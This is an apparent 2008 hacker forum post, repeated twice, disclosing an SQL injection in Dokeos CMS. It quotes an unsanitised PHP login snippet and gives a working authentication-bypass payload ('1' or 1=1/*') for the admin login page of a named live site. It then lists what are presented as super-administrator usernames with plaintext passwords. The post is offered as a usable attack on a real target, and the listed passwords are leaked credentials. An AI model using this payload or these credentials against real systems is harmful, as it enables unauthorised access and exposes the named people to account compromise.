ZAMUT
04.07.2008, 18:33
Dokeos CMS
Warning: magic_quotes_gpc = off
--------------------------------------
Site: dokeos.com [PR=6]
Status: Free
--------------------------------------
Vuln:
/claro_init_local.inc.php
............
if(isset($_POST['login']) && isset($_POST['password'])) // $login && $password are given to log in
{
$login = $_POST['login'];
$password = $_POST['password'];
.............
--------------------------------------
Exploit:
/admin/login.php
Your login : 1' or 1=1/*
Your password : x3kpass
--------------------------------------
Super Administrators:
yannick:adminPassword
thomas:upsi24lon
jwarnier:cisco123
ZAMUT (c)
Warning: magic_quotes_gpc = off
--------------------------------------
Site: dokeos.com [PR=6]
Status: Free
--------------------------------------
Vuln:
/claro_init_local.inc.php
............
if(isset($_POST['login']) && isset($_POST['password'])) // $login && $password are given to log in
{
$login = $_POST['login'];
$password = $_POST['password'];
.............
--------------------------------------
Exploit:
/admin/login.php
Your login : 1' or 1=1/*
Your password : x3kpass
--------------------------------------
Super Administrators:
yannick:adminPassword
thomas:upsi24lon
jwarnier:cisco123
ZAMUT (c)